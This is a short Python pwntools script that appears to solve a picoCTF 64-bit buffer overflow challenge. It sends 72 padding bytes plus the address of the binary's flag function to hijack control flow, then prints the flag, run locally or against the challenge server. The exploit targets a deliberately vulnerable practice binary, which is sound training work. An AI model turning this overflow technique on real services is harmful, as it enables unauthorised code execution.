#!/usr/bin/env nix-shell
#!nix-shell -p python3 -i python3 python3Packages.pwntools

from pwn import *

exe = ELF("./vuln")

context.binary = exe

ADDR, PORT, *_ = "saturn.picoctf.net 63864".split()

def conn():
    if args.REMOTE:
        r = remote(ADDR, PORT)
    else:
        r = process([exe.path])

    return r

def main():
  r = conn()

  print(r.recvuntil(b"Welcome to 64-bit. Give me a string that gets you the flag:"))
  offset = 72 # found with pwndbg
  print(f"flag: {hex(exe.sym.flag)}")
  print(p64(exe.sym.flag))
  payload = b'A' * offset + p64(exe.sym.flag + 5) # skip one instruction for some reason...
  r.sendline(payload)
  print(r.recvall())
  r.close()

if __name__ == "__main__":
    main()